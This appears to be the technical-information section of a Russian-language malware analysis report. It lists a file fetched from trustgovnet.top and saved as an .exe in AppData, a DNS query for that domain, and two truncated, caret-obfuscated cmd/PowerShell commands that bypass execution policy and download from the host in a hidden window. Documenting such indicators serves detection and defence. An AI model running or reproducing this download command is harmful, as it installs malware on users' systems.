Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^WersH^E^Ll.EXe^ -e^X^E^cu^tio^npOLiCy^ byPaSs -^noPr^OFi^Le ^-^Wi^Nd^owsTy^l^E hiD^DE^n (^nE^w-oBJe^CT ^Sy^s^TeM.^neT.WEbclIent)^.DOWnLoAdF^iLe^(^'http://trustgovnet.top/se...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /C "P^O^WersH^E^Ll.EXe^ -e^X^E^cu^tio^npOLiCy^ byPaSs -^noPr^OFi^Le ^-^Wi^Nd^owsTy^l^E hiD^DE^n (^nE^w-oBJe^CT ^Sy^s^TeM.^neT.WEbclIent)^.DOWnLoAdF^iLe^(^'http://trustgovnet.top/se...' (со скрытым окном)